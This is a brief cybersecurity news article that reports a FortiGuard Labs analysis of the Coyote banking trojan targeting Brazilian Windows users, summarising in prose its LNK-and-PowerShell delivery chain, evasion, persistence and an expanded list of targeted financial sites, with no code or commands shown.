Brazilian Windows Users Targeted by Coyote Banking Trojan
A campaign targeting Brazilian Windows users has delivered a banking malware known as Coyote. This malicious software is designed to steal sensitive financial information from users.
How the Malware Works
According to Fortinet FortiGuard Labs researcher Cara Lin, once deployed, the Coyote Banking Trojan can perform various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal credentials.
Malware Delivery Mechanism
The cybersecurity company discovered over the past month several Windows Shortcut (LNK) file artifacts that contain PowerShell commands responsible for delivering the malware. These LNK files are used to execute a PowerShell command to retrieve the next-stage from a remote server.
Exploitation of Vulnerabilities
The latest infection sequence commences with an LNK file that executes a PowerShell command to retrieve the next-stage from a remote server. Another PowerShell script launches a loader responsible for executing an interim payload.
Base64-Encoding and Exfiltration
The malware, once launched, gathers basic system information and the list of installed antivirus products on the host, after which the data is Base64-encoded and exfiltrated to a remote server. It also performs various checks to evade detection by sandboxes and virtual environments.
Evading Detection
The malware, leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate Language) payloads. The injected code leverages Donut to execute the final MSIL payloads, which are used to establish persistence by modifying the registry.
Expanding Target List
A notable change in the latest iteration of Coyote is the expansion of its target list to encompass 1,030 sites and 73 financial agents, such as mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, and others.
Complex Infection Process
The Coyote Trojan poses a significant threat to financial cybersecurity, particularly because it has the potential to expand beyond its initial targets. The infection process is complex and multi-staged, leveraging an LNK file for initial access, which subsequently led to the discovery of other malicious files.
Conclusion
The Coyote Banking Trojan is a sophisticated malware that can steal sensitive financial information from users. Its complex infection process and expansion of its target list make it a significant threat to financial cybersecurity.
Follow Us
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Source Link
